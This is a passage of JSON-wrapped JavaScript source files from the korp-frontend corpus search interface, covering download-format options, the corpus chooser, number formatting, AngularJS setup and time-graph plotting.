corpus_ids.length) {\n const corpus_id = corpus_ids[j]\n result_corpora_settings[corpus_id] = settings.corpora[corpus_id]\n j++\n }\n i++\n }\n $(\"#download-links\").append(\"<option value='init' rel='localize[download_kwic]'></option>\")\n i = 0\n while (i < settings.downloadFormats.length) {\n const format = settings.downloadFormats[i]\n // NOTE: Using attribute rel=\"localize[...]\" to localize the\n // title attribute requires a small change to\n // lib/jquery.localize.js. Without that, we could use\n // util.getLocaleString, but it would not change the\n // localizations immediately when switching languages but only\n // after reloading the page.\n // # title = util.getLocaleString('formatdescr_' + format)\n const option = $(`\\\n<option\n value=\"${format}\"\n title=\"${util.getLocaleString(`formatdescr_${format}`)}\"\n class=\"download_link\">${format.toUpperCase()}</option>\\\n`)\n\n const download_params = {\n // query_params: JSON.stringify($.deparam.querystring(xhr_settings.url)),\n query_params: xhr_settings.url,\n format,\n korp_url: window.location.href,\n korp_server_url: settings.korpBackendURL,\n corpus_config: JSON.stringify(result_corpora_settings),\n corpus_config_info_keys: [\"metadata\", \"licence\", \"homepage\", \"compiler\"].join(\",\"),\n urn_resolver: settings.urnResolver,\n }\n if (\"downloadFormatParams\" in settings) {\n if (\"*\" in settings.downloadFormatParams) {\n $.extend(download_params, settings.downloadFormatParams[\"*\"])\n }\n if (format in settings.downloadFormatParams) {\n $.extend(download_params, settings.downloadFormatParams[format])\n }\n }\n option.appendTo(\"#download-links\").data(\"params\", download_params)\n i++\n }\n $(\"#download-links\").off(\"change\")\n $(\"#download-links\")\n .localize()\n .click(false)\n .change(function (event) {\n const params = $(\":selected\", this).data(\"params\")\n if (!params) {\n return\n }\n $.generateFile(settings.downloadCgiScript, params)\n const self = $(this)\n return setTimeout(() => self.val(\"init\"), 1000)\n })\n}\n\nutil.searchHash = function (type, value) {\n locationSearch({\n search: type + \"|\" + value,\n page: 0,\n })\n}\n\nlet added_corpora_ids = []\nutil.loadCorporaFolderRecursive = function (first_level, folder) {\n let outHTML\n if (first_level) {\n outHTML = \"<ul>\"\n } else {\n outHTML = `<ul title=\"${folder.title}\" description=\"${escape(folder.description)}\">`\n }\n if (folder) {\n // This check makes the code work even if there isn't a ___settings.corporafolders = {};___ in config.js\n // Folders\n $.each(folder, function (fol, folVal) {\n if (fol !== \"contents\" && fol !== \"title\" && fol !== \"description\") {\n outHTML += `<li>${util.loadCorporaFolderRecursive(false, folVal)}</li>`\n }\n })\n\n // Corpora\n if (folder[\"contents\"] && folder[\"contents\"].length > 0) {\n $.each(folder.contents, function (key, value) {\n outHTML += `<li id=\"${value}\">${settings.corpora[value][\"title\"]}</li>`\n added_corpora_ids.push(value)\n })\n }\n }\n\n if (first_level) {\n // Add all corpora which have not been added to a corpus\n for (let val in settings.corpora) {\n let cont = false\n for (let usedid in added_corpora_ids) {\n if (added_corpora_ids[usedid] === val || settings.corpora[val].hide) {\n cont = true\n }\n }\n if (cont) {\n continue\n }\n\n // Add it anyway:\n outHTML += `<li id='${val}'>${settings.corpora[val].title}</li>`\n }\n }\n outHTML += \"</ul>\"\n return outHTML\n}\n\n// Helper function to turn \"8455999\" into \"8 455 999\"\nutil.prettyNumbers = function (numstring) {\n const regex = /(\\d+)(\\d{3})/\n let outStrNum = numstring.toString()\n while (regex.test(outStrNum)) {\n outStrNum = outStrNum.replace(\n regex,\n `$1<span rel=\"localize[util_numbergroupseparator]\">${util.getLocaleString(\n \"util_numbergroupseparator\"\n )}</span>$2`\n )\n }\n\n return outStrNum\n}\n\nutil.suffixedNumbers = function (num) {\n let out = \"\"\n if (num < 1000) {\n // 232\n out = num.toString()\n } else if (num >= 1000 && num < 1e6) {\n // 232,21K\n out = (num / 1000).toFixed(2).toString() + \"K\"\n } else if (num >= 1e6 && num < 1e9) {\n // 232,21M\n out = (num / 1e6).toFixed(2).toString() + \"M\"\n } else if (num >= 1e9 && num < 1e12) {\n // 232,21G\n out = (num / 1e9).toFixed(2).toString() + \"G\"\n } else if (num >= 1e12) {\n // 232,21T\n out = (num / 1e12).toFixed(2).toString() + \"T\"\n }\n return out.replace(\n \".\",\n `<span rel=\"localize[util_decimalseparator]\">${util.getLocaleString(\n \"util_decimalseparator\"\n )}</span>`\n )\n}\n\n// Goes through the settings.corporafolders and recursively adds the settings.corpora hierarchically to the corpus chooser widget\nutil.loadCorpora = function () {\n added_corpora_ids = []\n const outStr = util.loadCorporaFolderRecursive(true, settings.corporafolders)\n window.corpusChooserInstance = $(\"#corpusbox\")\n .corpusChooser({\n template: outStr,\n infoPopup(corpusID) {\n let baseLangSentenceHTML, baseLangTokenHTML, lang\n const corpusObj = settings.corpora[corpusID]\n let maybeInfo = \"\"\n if (corpusObj.description) {\n maybeInfo = `<br/><br/>${corpusObj.description}`\n }\n const numTokens = corpusObj.info.Size\n const baseLang = settings.corpora[corpusID] && settings.corpora[corpusID].linkedTo\n if (baseLang) {\n lang = ` (${util.getLocaleString(settings.corpora[corpusID].lang)})`\n baseLangTokenHTML = `${util.getLocaleString(\n \"corpselector_numberoftokens\"\n )}: <b>${util.prettyNumbers(settings.corpora[baseLang].info.Size)}\n</b> (${util.getLocaleString(settings.corpora[baseLang].lang)})<br/>\\\n`\n baseLangSentenceHTML = `${util.getLocaleString(\n \"corpselector_numberofsentences\"\n )}: <b>${util.prettyNumbers(settings.corpora[baseLang].info.Sentences)}\n</b> (${util.getLocaleString(settings.corpora[baseLang].lang)})<br/>\\\n`\n } else {\n lang = \"\"\n baseLangTokenHTML = \"\"\n baseLangSentenceHTML = \"\"\n }\n\n const numSentences = corpusObj[\"info\"][\"Sentences\"]\n let lastUpdate = corpusObj[\"info\"][\"Updated\"]\n if (!lastUpdate) {\n lastUpdate = \"?\"\n }\n let sentenceString = \"-\"\n if (numSentences) {\n sentenceString = util.prettyNumbers(numSentences.toString())\n }\n\n let output = `\\\n <b>\n <img class=\"popup_icon\" src=\"${korpIconImg}\" />\n ${corpusObj.title}\n </b>\n ${maybeInfo}\n <br/><br/>${baseLangTokenHTML}\n ${util.getLocaleString(\"corpselector_numberoftokens\")}:\n <b>${util.prettyNumbers(numTokens)}</b>${lang}\n <br/>${baseLangSentenceHTML}\n ${util.getLocaleString(\"corpselector_numberofsentences\")}:\n <b>${sentenceString}</b>${lang}\n <br/>\n ${util.getLocaleString(\"corpselector_lastupdate\")}:\n <b>${lastUpdate}</b>\n <br/><br/>`\n\n const supportsContext = _.keys(corpusObj.context).length > 1\n if (supportsContext) {\n output += $(\"<div>\").localeKey(\"corpselector_supports\").html() + \"<br>\"\n }\n if (corpusObj.limitedAccess) {\n output += $(\"<div>\").localeKey(\"corpselector_limited\").html()\n }\n return output\n },\n\n infoPopupFolder(indata) {\n const { corporaID } = indata\n const desc = indata.description\n let totalTokens = 0\n let totalSentences = 0\n let missingSentenceData = false\n $(corporaID).each(function (key, oneID) {\n totalTokens += parseInt(settings.corpora[oneID][\"info\"][\"Size\"])\n const oneCorpusSentences = settings.corpora[oneID][\"info\"][\"Sentences\"]\n if (oneCorpusSentences) {\n totalSentences += parseInt(oneCorpusSentences)\n } else {\n missingSentenceData = true\n }\n })\n\n let totalSentencesString = util.prettyNumbers(totalSentences.toString())\n if (missingSentenceData) {\n totalSentencesString += \"+\"\n }\n let maybeInfo = \"\"\n if (desc && desc !== \"\") {\n maybeInfo = desc + \"<br/><br/>\"\n }\n let glueString = \"\"\n if (corporaID.length === 1) {\n glueString = util.getLocaleString(\"corpselector_corporawith_sing\")\n } else {\n glueString = util.getLocaleString(\"corpselector_corporawith_plur\")\n }\n return `<b><img src=\"${folderImg}\" style=\"margin-right:4px; \\\n vertical-align:middle; margin-top:-1px\"/>${\n indata.title\n }</b><br/><br/>${maybeInfo}<b>${\n corporaID.length\n }</b> ${glueString}:<br/><br/><b>${util.prettyNumbers(\n totalTokens.toString()\n )}</b> ${util.getLocaleString(\n \"corpselector_tokens\"\n )}<br/><b>${totalSentencesString}</b> ${util.getLocaleString(\n \"corpselector_sentences\"\n )}`\n },\n })\n .bind(\"corpuschooserchange\", function (evt, corpora) {\n safeApply($(\"body\").scope(), function (scope) {\n scope.$broadcast(\"corpuschooserchange\", corpora)\n })\n })\n const selected = corpusChooserInstance.corpusChooser(\"selectedItems\")\n settings.corpusListing.select(selected)\n}\n\nwindow.regescape = (s) => s.replace(/[.|?|+|*||'|()^$]/g, \"\\\\$&\").replace(/\"/g, '\"\"')\n\nwindow.unregescape = (s) => s.replace(/\\\\/g, \"\").replace(/\"\"/g, '\"')\n\nutil.formatDecimalString = function (x, mode, statsmode, stringOnly) {\n if (_.includes(x, \".\")) {\n const parts = x.split(\".\")\n const decimalSeparator = util.getLocaleString(\"util_decimalseparator\")\n if (stringOnly) {\n return parts[0] + decimalSeparator + parts[1]\n }\n if (mode) {\n return (\n util.prettyNumbers(parts[0]) +\n '<span rel=\"localize[util_decimalseparator]\">' +\n decimalSeparator +\n \"</span>\" +\n parts[1]\n )\n } else {\n return util.prettyNumbers(parts[0]) + decimalSeparator + parts[1]\n }\n } else {\n if (statsmode) {\n return x\n } else {\n return util.prettyNumbers(x)\n }\n }\n}\n\nutil.browserWarn = function () {\n $.reject({\n reject: {\n msie5: true,\n msie6: true,\n msie7: true,\n msie8: true,\n msie9: true,\n },\n\n imagePath: _.split(jRejectBackgroundImg, \"/\").slice(0, -1).join(\"/\"),\n display: [\"firefox\", \"chrome\", \"safari\", \"opera\"],\n browserInfo: {\n // Settings for which browsers to display\n firefox: {\n text: \"Firefox\", // Text below the icon\n url: \"http://www.mozilla.com/firefox/\",\n }, // URL For icon/text link\n\n safari: {\n text: \"Safari\",\n url: \"http://www.apple.com/safari/download/\",\n },\n\n opera: {\n text: \"Opera\",\n url: \"http://www.opera.com/download/\",\n },\n\n chrome: {\n text: \"Chrome\",\n url: \"http://www.google.com/chrome/\",\n },\n\n msie: {\n text: \"Internet Explorer\",\n url: \"http://www.microsoft.com/windows/Internet-explorer/\",\n },\n },\n\n header: \"Du använder en omodern webbläsare\", // Header of pop-up window\n paragraph1:\n \"Korp använder sig av moderna webbteknologier som inte stödjs av din webbläsare. En lista på de mest populära moderna alternativen visas nedan. Firefox rekommenderas varmt.\", // Paragraph 1\n paragraph2: \"\", // Paragraph 2\n closeMessage:\n \"Du kan fortsätta ändå – all funktionalitet är densamma – men så fort du önskar att Korp vore snyggare och snabbare är det bara att installera Firefox, det tar bara en minut.\", // Message displayed below closing link\n closeLink: \"Stäng varningen\", // Text for closing link\n // header: 'Did you know that your Internet Browser is out of date?', // Header of pop-up window\n // paragraph1: 'Your browser is out of date, and may not be compatible with our website. A list of the most popular web browsers can be found below.', // Paragraph 1\n // paragraph2: 'Just click on the icons to get to the download page', // Paragraph 2\n // closeMessage: 'By closing this window you acknowledge that your experience on this website may be degraded', // Message displayed below closing link\n // closeLink: 'Close This Window', // Text for closing link\n closeCookie: true, // If cookies should be used to remmember if the window was closed (see cookieSettings for more options)\n // Cookie settings are only used if closeCookie is true\n cookieSettings: {\n path: \"/\", // Path for the cookie to be saved on (should be root domain in most cases)\n expires: 100000,\n },\n }) // Expiration Date (in seconds), 0 (default) means it ends with the current session\n}\n\nwindow.__ = {}\nwindow.__.remove = function (arr, elem) {\n const index = arr.indexOf(elem)\n if (index !== -1) {\n return arr.splice(arr.indexOf(elem), 1)\n }\n}\n"
},
{
"alpha_fraction": 0.4333641827106476,
"alphanum_fraction": 0.4376060366630554,
"avg_line_length": 32.94240951538086,
"blob_id": "ad66544d2566807387d48fe6f74ffaea2c0ee26f",
"content_id": "d4b4b6132f41111cd99027992362072ff6f59cb7",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 12966,
"license_type": "permissive",
"max_line_length": 132,
"num_lines": 382,
"path": "/app/scripts/main.js",
"repo_name": "UAlbertaALTLab/korp-frontend",
"src_encoding": "UTF-8",
"text": "/** @format */\nconst korpFailImg = require(\"../img/korp_fail.svg\")\nconst deparam = require(\"jquery-deparam\")\n\nimport jStorage from \"../lib/jstorage\"\n\nwindow.authenticationProxy = new model.AuthenticationProxy()\nwindow.timeProxy = new model.TimeProxy()\n\nconst creds = jStorage.get(\"creds\")\nif (creds) {\n authenticationProxy.loginObj = creds\n}\n\n// rewriting old url format to the angular one\nif (location.hash.length && location.hash[1] !== \"?\") {\n location.hash = `#?${_.trimStart(location.hash, \"#\")}`\n}\n\n$.ajaxSetup({\n dataType: \"json\",\n traditional: true,\n})\n\n$.ajaxPrefilter(\"json\", function (options) {\n if (options.crossDomain && !$.support.cors) {\n return \"jsonp\"\n }\n})\n\nconst deferred_domReady = $.Deferred(function (dfd) {\n $(function () {\n let { mode } = deparam(window.location.search.slice(1))\n if (!mode) {\n mode = \"default\"\n }\n return $.getScript(`modes/${mode}_mode.js`)\n .done(() => dfd.resolve())\n .fail((jqxhr, settings, exception) => c.error(\"Mode file parsing error: \", exception))\n })\n return dfd\n}).promise()\n\nconst loc_dfd = window.initLocales()\n$(document).keyup(function (event) {\n if (event.keyCode === 27) {\n if (kwicResults) {\n kwicResults.abort()\n }\n if (\"lemgramResults\" in window) {\n lemgramResults.abort()\n }\n if (statsResults) {\n statsResults.abort()\n }\n }\n})\n\n$.when(loc_dfd, deferred_domReady).then(\n function () {\n try {\n angular.bootstrap(document, [\"korpApp\"])\n } catch (error) {\n c.error(error)\n }\n\n try {\n const corpus = locationSearch()[\"corpus\"]\n if (corpus) {\n settings.corpusListing.select(corpus.split(\",\"))\n }\n view.updateSearchHistory()\n } catch (error1) {\n c.error(\"ERROR setting corpora from location\", error1)\n }\n\n if (isLab) {\n $(\"body\").addClass(\"lab\")\n }\n\n $(\"body\").addClass(`mode-${window.currentMode}`)\n util.browserWarn()\n\n $(\"#search_history\").change(function (event) {\n const target = $(this).find(\":selected\")\n if (_.includes([\"http://\", \"https:/\"], target.val().slice(0, 7))) {\n location.href = target.val()\n } else if (target.is(\".clear\")) {\n jStorage.set(\"searches\", [])\n view.updateSearchHistory()\n }\n })\n\n let prevFragment = {}\n // Note that this is _not_ window.onhashchange (lowercase only) and is not called by the browser\n window.onHashChange = function (event, isInit) {\n const hasChanged = (key) => prevFragment[key] !== locationSearch()[key]\n if (hasChanged(\"lang\")) {\n const newLang = locationSearch().lang || settings.defaultLanguage\n $(\"body\").scope().lang = newLang\n window.lang = newLang\n util.localize()\n\n $(\"#languages\").radioList(\"select\", newLang)\n }\n\n if (isInit) {\n util.localize()\n }\n\n prevFragment = _.extend({}, locationSearch())\n }\n\n $(\"#languages\").radioList({\n change() {\n const currentLang = $(this).radioList(\"getSelected\").data(\"mode\")\n locationSearch({\n lang: currentLang !== settings.defaultLanguage ? currentLang : null,\n })\n },\n // TODO: this does nothing?\n selected: settings.defaultLanguage,\n })\n\n setTimeout(() => window.onHashChange(null, true), 0)\n $(\"body\").animate({ opacity: 1 }, function () {\n $(this).css(\"opacity\", \"\")\n })\n },\n function () {\n c.log(\"failed to load some resource at startup.\", arguments)\n return $(\"body\")\n .css({\n opacity: 1,\n padding: 20,\n })\n .html('<object class=\"korp_fail\" type=\"image/svg+xml\" data=\"img/korp_fail.svg\">')\n .append(\"<p>The server failed to respond, please try again later.</p>\")\n }\n)\n\nwindow.getAllCorporaInFolders = function (lastLevel, folderOrCorpus) {\n let outCorpora = []\n\n // Go down the alley to the last subfolder\n while (folderOrCorpus.includes(\".\")) {\n const posOfPeriod = _.indexOf(folderOrCorpus, \".\")\n const leftPart = folderOrCorpus.substr(0, posOfPeriod)\n const rightPart = folderOrCorpus.substr(posOfPeriod + 1)\n if (lastLevel[leftPart]) {\n lastLevel = lastLevel[leftPart]\n folderOrCorpus = rightPart\n } else {\n break\n }\n }\n if (lastLevel[folderOrCorpus]) {\n // Folder\n // Continue to go through any subfolders\n $.each(lastLevel[folderOrCorpus], function (key, val) {\n if (![\"title\", \"contents\", \"description\"].includes(key)) {\n outCorpora = outCorpora.concat(\n getAllCorporaInFolders(lastLevel[folderOrCorpus], key)\n )\n }\n })\n\n // And add the corpora in this folder level\n outCorpora = outCorpora.concat(lastLevel[folderOrCorpus][\"contents\"])\n } else {\n // Corpus\n outCorpora.push(folderOrCorpus)\n }\n return outCorpora\n}\n\nwindow.initTimeGraph = function (def) {\n let timestruct = null\n let restdata = null\n let restyear = null\n let hasRest = false\n\n let onTimeGraphChange\n\n const getValByDate = function (date, struct) {\n let output = null\n $.each(struct, function (i, item) {\n if (date === item[0]) {\n output = item[1]\n return false\n }\n })\n\n return output\n }\n\n window.timeDeferred = timeProxy\n .makeRequest()\n .fail((error) => {\n console.error(error)\n $(\"#time_graph\").html(\"<i>Could not draw graph due to a backend error.</i>\")\n })\n .done(function (...args) {\n let [dataByCorpus, all_timestruct, rest] = args[0]\n\n if (all_timestruct.length == 0) {\n return\n }\n\n for (let corpus in dataByCorpus) {\n let struct = dataByCorpus[corpus]\n if (corpus !== \"time\") {\n const cor = settings.corpora[corpus.toLowerCase()]\n timeProxy.expandTimeStruct(struct)\n cor.non_time = struct[\"\"]\n struct = _.omit(struct, \"\")\n cor.time = struct\n if (_.keys(struct).length > 1) {\n if (cor.common_attributes == null) {\n cor.common_attributes = {}\n }\n cor.common_attributes.date_interval = true\n }\n }\n }\n\n safeApply($(\"body\").scope(), function (scope) {\n scope.$broadcast(\n \"corpuschooserchange\",\n corpusChooserInstance.corpusChooser(\"selectedItems\")\n )\n return def.resolve()\n })\n\n onTimeGraphChange = function (evt, data) {\n let max = _.reduce(\n all_timestruct,\n function (accu, item) {\n if (item[1] > accu) {\n return item[1]\n }\n return accu\n },\n 0\n )\n\n // the 46 here is the presumed value of\n // the height of the graph\n const one_px = max / 46\n\n const normalize = (array) =>\n _.map(array, function (item) {\n const out = [].concat(item)\n if (out[1] < one_px && out[1] > 0) {\n out[1] = one_px\n }\n return out\n })\n\n const output = _(settings.corpusListing.selected)\n .map(\"time\")\n .filter(Boolean)\n .map(_.toPairs)\n .flatten(true)\n .reduce(function (memo, ...rest1) {\n const [a, b] = rest1[0]\n if (typeof memo[a] === \"undefined\") {\n memo[a] = b\n } else {\n memo[a] += b\n }\n return memo\n }, {})\n\n timestruct = timeProxy.compilePlotArray(output)\n const endyear = all_timestruct.slice(-1)[0][0]\n const yeardiff = endyear - all_timestruct[0][0]\n restyear = endyear + yeardiff / 25\n restdata = _(settings.corpusListing.selected)\n .filter((item) => item.time)\n .reduce((accu, corp) => accu + parseInt(corp.non_time || \"0\"), 0)\n\n hasRest = yeardiff > 0\n\n const plots = [\n { data: normalize([].concat(all_timestruct, [[restyear, rest]])) },\n { data: normalize(timestruct) },\n ]\n if (restdata) {\n plots.push({\n data: normalize([[restyear, restdata]]),\n })\n }\n\n $.plot($(\"#time_graph\"), plots, {\n bars: {\n show: true,\n fill: 1,\n align: \"center\",\n },\n\n grid: {\n hoverable: true,\n borderColor: \"white\",\n },\n\n yaxis: {\n show: false,\n },\n\n xaxis: {\n show: true,\n tickDecimals: 0,\n },\n\n hoverable: true,\n colors: [\"lightgrey\", \"navy\", \"#cd5c5c\"],\n })\n return $.each($(\"#time_graph .tickLabel\"), function () {\n if (parseInt($(this).text()) > new Date().getFullYear()) {\n return $(this).hide()\n }\n })\n }\n\n return $(\"#time_graph,#rest_time_graph\").bind(\n \"plothover\",\n _.throttle(function (event, pos, item) {\n if (item) {\n let total, val\n const date = item.datapoint[0]\n const header = $(\"<h4>\")\n if (date === restyear && hasRest) {\n header.text(util.getLocaleString(\"corpselector_rest_time\"))\n val = restdata\n total = rest\n } else {\n header.text(\n util.getLocaleString(\"corpselector_time\") + \" \" + item.datapoint[0]\n )\n val = getValByDate(date, timestruct)\n total = getValByDate(date, all_timestruct)\n }\n\n const pTmpl = _.template(\n \"<p><span rel='localize[<%= loc %>]'></span>: <%= num %> <span rel='localize[corpselector_tokens]' </p>\"\n )\n const firstrow = pTmpl({\n loc: \"corpselector_time_chosen\",\n num: util.prettyNumbers(val || 0),\n })\n const secondrow = pTmpl({\n loc: \"corpselector_of_total\",\n num: util.prettyNumbers(total),\n })\n $(\".corpusInfoSpace\").css({\n top: $(this).parent().offset().top,\n })\n return $(\".corpusInfoSpace\")\n .find(\"p\")\n .empty()\n .append(header, \"<span> </span>\", firstrow, secondrow)\n .localize()\n .end()\n .fadeIn(\"fast\")\n } else {\n return $(\".corpusInfoSpace\").fadeOut(\"fast\")\n }\n }, 100)\n )\n })\n\n const opendfd = $.Deferred()\n $(\"#corpusbox\").one(\"corpuschooseropen\", () => opendfd.resolve())\n\n return $.when(window.timeDeferred, opendfd).then(function () {\n if (onTimeGraphChange) {\n $(\"#corpusbox\").bind(\"corpuschooserchange\", onTimeGraphChange)\n return onTimeGraphChange()\n }\n })\n}\n"
},
{
"alpha_fraction": 0.7272065877914429,
"alphanum_fraction": 0.7284190058708191,
"avg_line_length": 30.968992233276367,
"blob_id": "8d77af8b99be8609dbcde7f77914866eb72633ad",
"content_id": "2e42beaf6964b60b515fbdd3f1ef3145973c1544",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 4124,
"license_type": "permissive",
"max_line_length": 83,
"num_lines": 129,
"path": "/app/index.js",
"repo_name": "UAlbertaALTLab/korp-frontend",
"src_encoding": "UTF-8",
"text": "const $ = require(`jquery`);\nwindow.jQuery = $;\nwindow.$ = $;\n\nrequire(`slickgrid/slick.grid.css`);\nrequire(`./lib/jquery.reject.css`);\nrequire(`./styles/ui_mods.css`);\nrequire(`./styles/jquery.tooltip.css`);\nrequire(`rickshaw/rickshaw.css`);\n\nrequire(`leaflet/dist/leaflet.css`);\nrequire(`leaflet.markercluster/dist/MarkerCluster.css`);\nrequire(`geokorp/dist/styles/geokorp.css`);\nrequire(`components-jqueryui/themes/smoothness/jquery-ui.min.css`);\nrequire(`./styles/_bootstrap-custom.scss`);\n\nrequire(`./styles/tailwind.scss`);\n\nrequire(`./styles/styles.scss`);\nrequire(`./styles/textreader.css`);\n\nwindow._ = require(`lodash`);\n\nrequire(`components-jqueryui/ui/widget.js`);\nrequire(`components-jqueryui/ui/widgets/sortable.js`);\nrequire(`components-jqueryui/ui/widgets/dialog.js`);\n\nrequire(`angular`);\nrequire(`angular-ui-bootstrap/src/typeahead`);\nrequire(`angular-ui-bootstrap/src/tooltip`);\nrequire(`angular-ui-bootstrap/src/modal`);\nrequire(`angular-ui-bootstrap/src/tabs`);\nrequire(`angular-ui-bootstrap/src/dropdown`);\nrequire(`angular-ui-bootstrap/src/pagination`);\nrequire(`angular-ui-bootstrap/src/datepicker`);\nrequire(`angular-ui-bootstrap/src/timepicker`);\nrequire(`angular-ui-bootstrap/src/buttons`);\nrequire(`angular-ui-bootstrap/src/popover`);\n\nrequire(`angular-spinner`);\nrequire(`angular-ui-sortable/src/sortable`);\n\nrequire(`jreject`);\nrequire(`jquerylocalize`);\nrequire(`jqueryhoverintent`);\nrequire(`./lib/jquery.format.js`);\n\nconst deparam = require(`jquery-deparam`);\n\nwindow.c = console;\nwindow.isLab = window.location.pathname.split(`/`)[1] == `korplabb`;\nwindow.currentMode = deparam(window.location.search.slice(1)).mode || `default`;\n\n// tmhDynamicLocale = require(\"angular-dynamic-locale/src/tmhDynamicLocale\")\nrequire(`angular-dynamic-locale/dist/tmhDynamicLocale.js`);\nwindow.Raphael = require(`raphael`);\n\nrequire(`jquery-flot/jquery.flot.js`);\nrequire(`jquery-flot/jquery.flot.stack.js`);\n\nrequire(`slickgrid/lib/jquery.event.drag-2.3.0`);\nrequire(`slickgrid/slick.core`);\nrequire(`slickgrid/slick.grid`);\nrequire(`slickgrid/plugins/slick.checkboxselectcolumn`);\nrequire(`slickgrid/plugins/slick.rowselectionmodel`);\n\nrequire(`./scripts/jq_extensions.js`);\n\nwindow.moment = require(`moment`);\nwindow.CSV = require(`comma-separated-values/csv`);\n\nrequire(`./lib/leaflet-settings.js`);\n// require(\"leaflet\")\n// require(\"leaflet.markercluster\")\n// require(\"leaflet-providers\")\nrequire(`geokorp/dist/scripts/geokorp`);\nrequire(`geokorp/dist/scripts/geokorp-templates`);\nrequire(`angular-filter/index.js`);\n\n\nrequire(`./lib/jquery.tooltip.pack.js`);\n\nwindow.settings = {};\nsettings.markup = {\n msd: require(`./markup/msd.html`),\n};\nrequire(`configjs`);\nconst commonSettings = require(`commonjs`);\n// we need to put the exports on window so that the non-webpacked modes modes files\n// can use the exports\n_.map(commonSettings, function(v, k) {\n if (k in window) {\n console.error(`warning, overwriting setting` + k);\n }\n window[k] = v;\n});\n\nrequire(`./scripts/components/sidebar.js`);\n\nrequire(`./scripts/statistics.js`);\nrequire(`./scripts/cqp_parser/CQPParser.js`);\nrequire(`./scripts/cqp_parser/cqp.js`);\nrequire(`./scripts/util.js`);\nrequire(`./scripts/pie-widget.js`);\nrequire(`./scripts/search.js`);\nrequire(`./scripts/results.js`);\nrequire(`./scripts/model.js`);\nrequire(`./scripts/widgets.js`);\nrequire(`./scripts/main.js`);\nrequire(`./scripts/selector_widget.js`);\nrequire(`./scripts/app.js`);\nrequire(`./scripts/search_controllers.js`);\nrequire(`./scripts/kwic_download.js`);\nrequire(`./scripts/result_controllers.js`);\nrequire(`./scripts/map_controllers.js`);\nrequire(`./scripts/text_reader_controller.js`);\nrequire(`./scripts/video_controllers.js`);\nrequire(`./scripts/services.js`);\nrequire(`./scripts/extended.js`);\nrequire(`./scripts/struct_services.js`);\nrequire(`./scripts/directives.js`);\nrequire(`./scripts/filter_directives.js`);\nrequire(`./scripts/newsdesk.js`);\n\nfunction requireAll(r) { r.keys().forEach(r); }\nrequireAll(require.context(`customcss`, true, /\\.css$/));\nrequireAll(require.context(`customscripts`, true, /\\.js$/));\n\nrequire(`./index.pug`);\n"
},
{
"alpha_fraction": 0.5468671917915344,
"alphanum_fraction": 0.5472826957702637,
"avg_line_length": 30.09560775756836,
"blob_id": "7f01708dde96c958bd39ecc81788bff59c604200",
"content_id": "77c0212c8436e7f25bc9f61556c893366d9f8482",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 12034,
"license_type": "permissive",
"max_line_length": 99,
"num_lines": 387,
"path": "/app/scripts/app.js",
"repo_name": "UAlbertaALTLab/korp-frontend",
"src_encoding": "UTF-8",
"text": "/** @format */\n\nimport jStorage from \"../lib/jstorage\"\nimport { kwicPagerName, kwicPager } from \"./components/pager\"\nimport { sidebarName, sidebarComponent } from \"./components/sidebar\"\nimport { setDefaultConfigValues } from \"./settings.js\"\n\nsetDefaultConfigValues()\n\nwindow.korpApp = angular.module(\"korpApp\", [\n \"ui.bootstrap.typeahead\",\n \"uib/template/typeahead/typeahead-popup.html\",\n \"uib/template/typeahead/typeahead-match.html\",\n \"ui.bootstrap.tooltip\",\n \"uib/template/tooltip/tooltip-popup.html\",\n \"uib/template/tooltip/tooltip-html-popup.html\",\n \"ui.bootstrap.modal\",\n \"uib/template/modal/window.html\",\n \"ui.bootstrap.tabs\",\n \"uib/template/tabs/tabset.html\",\n \"uib/template/tabs/tab.html\",\n \"ui.bootstrap.dropdown\",\n \"ui.bootstrap.pagination\",\n \"uib/template/pagination/pagination.html\",\n \"ui.bootstrap.datepicker\",\n \"uib/template/datepicker/datepicker.html\",\n \"uib/template/datepicker/day.html\",\n \"uib/template/datepicker/month.html\",\n \"uib/template/datepicker/year.html\",\n \"ui.bootstrap.timepicker\",\n \"uib/template/timepicker/timepicker.html\",\n \"ui.bootstrap.buttons\",\n \"ui.bootstrap.popover\",\n \"uib/template/popover/popover.html\",\n \"uib/template/popover/popover-template.html\",\n \"angularSpinner\",\n \"ui.sortable\",\n \"newsdesk\",\n \"sbMap\",\n \"tmh.dynamicLocale\",\n \"angular.filter\",\n])\n\nkorpApp.component(kwicPagerName, kwicPager).component(sidebarName, sidebarComponent)\n\nkorpApp.config((tmhDynamicLocaleProvider) =>\n tmhDynamicLocaleProvider.localeLocationPattern(\"translations/angular-locale_{{locale}}.js\")\n)\n\nkorpApp.config(($uibTooltipProvider) =>\n $uibTooltipProvider.options({\n appendToBody: true,\n })\n)\n\nkorpApp.config([\"$locationProvider\", ($locationProvider) => $locationProvider.hashPrefix(\"\")])\n\nkorpApp.config([\n \"$compileProvider\",\n ($compileProvider) =>\n $compileProvider.aHrefSanitizationWhitelist(/^\\s*(https?|ftp|mailto|tel|file|blob):/),\n])\n\nkorpApp.run(function ($rootScope, $location, searches, tmhDynamicLocale, $q, $timeout) {\n const s = $rootScope\n s._settings = settings\n window.lang = s.lang = $location.search().lang || settings.defaultLanguage\n s.word_selected = null\n s.isLab = window.isLab\n\n // s.sidebar_visible = false\n\n s.extendedCQP = null\n\n s.globalFilterDef = $q.defer()\n\n s.locationSearch = function () {\n const search = $location.search(...arguments)\n $location.replace()\n return search\n }\n\n s.searchtabs = () => $(\".search_tabs > ul\").scope().tabset.tabs\n\n tmhDynamicLocale.set(\"en\")\n\n s._loc = $location\n\n s.$watch(\"_loc.search()\", function () {\n _.defer(() => (window.onHashChange || _.noop)())\n\n return tmhDynamicLocale.set($location.search().lang || \"sv\")\n })\n\n $rootScope.kwicTabs = []\n $rootScope.compareTabs = []\n $rootScope.graphTabs = []\n $rootScope.mapTabs = []\n $rootScope.textTabs = []\n\n if ($location.search().corpus) {\n const initialCorpora = []\n\n function findInFolder(folder) {\n // checks if folder is an actual folder of corpora and recursively\n // collects all corpora in this folder and subfolders\n const corpusIds = []\n if (folder && folder.contents) {\n for (let corpusId of folder.contents) {\n corpusIds.push(corpusId)\n }\n for (let subFolderId of Object.keys(folder)) {\n for (let corpusId of findInFolder(folder[subFolderId])) {\n corpusIds.push(corpusId)\n }\n }\n }\n return corpusIds\n }\n\n for (let corpus of $location.search().corpus.split(\",\")) {\n const corpusObj = settings.corpusListing.struct[corpus]\n if 